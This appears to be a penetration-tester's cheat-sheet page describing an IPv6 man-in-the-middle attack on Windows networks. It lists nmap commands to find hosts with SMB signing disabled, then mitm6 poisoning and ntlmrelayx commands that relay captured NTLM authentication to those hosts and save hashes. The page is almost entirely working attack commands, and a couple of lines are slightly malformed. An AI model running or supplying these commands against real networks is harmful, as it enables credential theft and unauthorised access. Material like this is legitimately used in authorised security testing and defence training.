IPV6 With MITM6

First create a target list of hosts with SMB open:

nmap -p445 -sS -iL live_ips.txt -oA 445_scan cat 445_scan.gnmap | grep open | cut -d' ' -f2 > open_445.txt

Then find hosts with SMB signing disabled or not required:

nmap -n --script smb-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -n '/^Nmap/h;/disabled|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt 
nmap -n --script smb2-security-mode.nse -p445 -iL open_445.txt -oA smb_script 
sed -n '/^Nmap/h;/not required|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt

Finally relay poisoned sessions to the target list:

mitm6 -d domain.com -hb HVAC 
ntlmrelayx.py -tf smb_disabled.txt -socks -smb2support -6 -wh whitelist.domain.com -of hashes2

GitHub - dirkjanm/mitm6: pwning IPv4 via IPv6GitHub

mitm6 – compromising IPv4 networks via IPv6Fox-IT International blog

PreviousIPV4 NextDomain Enumeration

Last updated 3 years ago

Was this helpful?